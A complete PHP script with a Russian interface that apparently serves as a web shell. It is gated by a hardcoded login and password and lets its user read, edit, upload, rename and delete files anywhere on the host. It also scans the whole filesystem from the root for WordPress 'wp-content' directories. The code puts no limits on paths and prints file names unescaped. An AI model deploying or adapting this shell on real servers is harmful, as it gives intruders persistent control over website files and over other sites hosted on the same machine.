<?php
session_start();

// Авторизация
$username = 'admin';
$password = '3tu/T?TJ8v?N';

if (!isset($_SESSION['auth'])) {
    if (isset($_POST['login'], $_POST['pass'])) {
        if ($_POST['login'] === $username && $_POST['pass'] === $password) {
            $_SESSION['auth'] = true;
            header('Location: ?');
            exit;
        } else {
            die("Неверный логин или пароль.");
        }
    }
    echo '<form method="post">Логин:<br><input name="login"><br>Пароль:<br><input type="password" name="pass"><br><button>Войти</button></form>';
    exit;
}

// === ГЛОБАЛЬНЫЙ ПОИСК wp-content ===
function deepScanGlobal($startDir = '/') {
    $results = [];
    $stack = [$startDir];

    while (!empty($stack)) {
        $current = array_pop($stack);

        if (!is_dir($current) || is_link($current)) continue;

        $items = @scandir($current);
        if (!$items) continue;

        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $fullPath = $current . DIRECTORY_SEPARATOR . $item;

            if (is_dir($fullPath)) {
                if (basename($fullPath) === 'wp-content') {
                    $results[] = realpath($fullPath);
                }
                $stack[] = $fullPath;
            }
        }
    }

    return $results;
}

if (isset($_GET['findwpglobal'])) {
    echo "<h3>Глобальный поиск 'wp-content' с корня сервера (/)</h3>";
    echo "<p>Это может занять несколько минут...</p><hr>";

    @set_time_limit(0);
    @ini_set('memory_limit', '512M');

    $found = deepScanGlobal('/');

    if (empty($found)) {
        echo "<p>❌ Ничего не найдено.</p>";
    } else {
        foreach ($found as $dir) {
            $url = '?path=' . urlencode($dir);
            echo "<a href=\"$url\"><code>$dir</code></a><br>";
        }
    }

    echo '<br><a href="?">⬅️ Назад</a><br>';
    exit;
}
// === КОНЕЦ поиска wp-content ===

$path = isset($_GET['path']) ? realpath($_GET['path']) : realpath(__DIR__);
if (!$path) $path = realpath(__DIR__);

if (isset($_POST['newfile'])) {
    $newFilePath = $path . '/' . basename($_POST['newfile']);
    if (!file_exists($newFilePath)) {
        file_put_contents($newFilePath, '');
        echo "<p>Файл создан успешно!</p>";
    } else {
        echo "<p>Файл уже существует!</p>";
    }
}

if (isset($_POST['content'], $_POST['file'])) {
    $file = realpath($_POST['file']);
    if ($file && is_writable($file)) {
        file_put_contents($file, $_POST['content']);
        echo "<p>Файл сохранён успешно!</p>";
    } else {
        echo "<p>Ошибка сохранения файла!</p>";
    }
}

if (isset($_POST['upload']) && isset($_FILES['uploads'])) {
    foreach ($_FILES['uploads']['tmp_name'] as $key => $tmp_name) {
        $name = basename($_FILES['uploads']['name'][$key]);
        move_uploaded_file($tmp_name, $path . '/' . $name);
    }
    header('Location: ?path=' . urlencode($path));
    exit;
}

if (isset($_POST['create'], $_POST['name'])) {
    $newPath = $path . '/' . basename($_POST['name']);
    if (!file_exists($newPath)) {
        if ($_POST['create'] === 'folder') {
            mkdir($newPath, 0755);
        } else {
            file_put_contents($newPath, '');
        }
        header('Location: ?path=' . urlencode($path));
        exit;
    } else {
        echo "<p>Файл или папка уже существует!</p>";
    }
}

if (isset($_POST['action']) && $_POST['action'] === 'rename' && isset($_POST['oldname'], $_POST['newname'])) {
    $old = realpath($path . '/' . $_POST['oldname']);
    $new = $path . '/' . basename($_POST['newname']);
    if ($old && $old !== $new) {
        rename($old, $new);
        header('Location: ?path=' . urlencode($path));
        exit;
    } else {
        echo "<p>Ошибка переименования.</p>";
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'delete') {
    $selected = $_POST['selected_files'] ?? [];
    foreach ($selected as $f) {
        $target = realpath($path . DIRECTORY_SEPARATOR . $f);
        if (!$target) continue;
        if (is_file($target)) {
            @unlink($target) or $message .= "Не удалось удалить '$f'.<br>";
        } elseif (is_dir($target)) {
            @rmdir($target) or $message .= "Не удалось удалить папку '$f'. Возможно, она не пуста.<br>";
        }
    }
}

if (is_file($path)) {
    $content = htmlspecialchars(file_get_contents($path));
    echo '<a href="?path=' . urlencode(dirname($path)) . '">⬅️ Назад</a><br><br>';
    echo '<form method="post"><textarea name="content" style="width:100%; height:400px;">' . $content . '</textarea><br>';
    echo '<input type="hidden" name="file" value="' . htmlspecialchars($path) . '">';
    echo '<button>Сохранить</button></form>';
    exit;
}

$dir = scandir($path);
echo "<h3>Файлы в: $path</h3>";
echo '<form method="get" style="display:inline;"><button type="submit" name="findwpglobal" value="1">Найти wp-content во всей системе</button></form><br><br>';

echo '<form method="post" enctype="multipart/form-data">';
echo '<div style="margin-bottom: 10px;">';
echo '<input type="file" name="uploads[]" multiple style="margin-right: 10px;">';
echo '<button type="submit" name="upload">Загрузить</button>';
echo '</div>';
echo '</form>';

echo '<form method="post">';
echo '<div style="margin-bottom: 10px;">';
echo '<input type="text" name="name" placeholder="Имя файла или папки" style="margin-right: 10px;">';
echo '<button type="submit" name="create" value="file">Создать файл</button>';
echo '<button type="submit" name="create" value="folder">Создать папку</button>';
echo '</div>';
echo '</form>';

echo '<form method="post">';
echo '<div style="margin-bottom: 10px;">';
echo '<button type="submit" name="action" value="delete">Удалить</button>';
echo '<button type="button" onclick="renameSelected()">Переименовать</button>';
echo '</div>';

// Минимальный CSS + убираем отступы у <p>
echo '<style>
body { font-family: sans-serif; font-size: 15px; }
form, ul { margin-bottom: 10px; }
input[type=text] { padding: 2px 6px; }
button { padding: 2px 8px; margin-right: 4px; }
ul { list-style: none; padding-left: 0; }
li { margin-bottom: 2px; }
a { text-decoration: none; color: #1a0dab; }
a:hover { text-decoration: underline; }
[type=file] { margin-bottom: 4px; }
p { margin: 0; padding: 0; }
</style>';

// Функция генерации списка файлов/папок с размером
echo '<ul>';
foreach ($dir as $item) {
    if ($item === '.') continue;
    $itemPath = realpath($path . '/' . $item);
    if ($itemPath === false) continue;
    $size = is_file($itemPath) ? filesize($itemPath) : '-';
    echo '<li>';
    echo '<input type="checkbox" name="selected_files[]" value="' . htmlspecialchars($item) . '">';
    echo '<a href="?path=' . urlencode($itemPath) . '">' . $item . '</a>';
    echo ' <span style="color: #888; font-size: 90%;">(' . $size . ' байт)</span>';
    echo '</li>';
}
echo '</ul>';

// JavaScript для функций
echo '<script>
function toggleSelectAll(source) {
    var checkboxes = document.getElementsByName("selected_files[]");
    for (var i = 0; i < checkboxes.length; i++) {
        checkboxes[i].checked = source.checked;
    }
}

function renameSelected() {
    const selectedFiles = document.getElementsByName("selected_files[]");
    const checkedFiles = Array.from(selectedFiles).filter(f => f.checked);
    
    if (checkedFiles.length === 0) {
        alert("Пожалуйста, выберите файл для переименования");
        return;
    }
    
    if (checkedFiles.length > 1) {
        alert("Пожалуйста, выберите только один файл для переименования");
        return;
    }
    
    const oldName = checkedFiles[0].value;
    const newName = prompt("Введите новое имя:", oldName);
    
    if (!newName || newName === oldName) {
        return;
    }
    
    const form = document.createElement("form");
    form.method = "post";
    form.innerHTML = `
        <input type="hidden" name="action" value="rename">
        <input type="hidden" name="oldname" value="${oldName}">
        <input type="hidden" name="newname" value="${newName}">
    `;
    document.body.appendChild(form);
    form.submit();
}
</script>';
?>
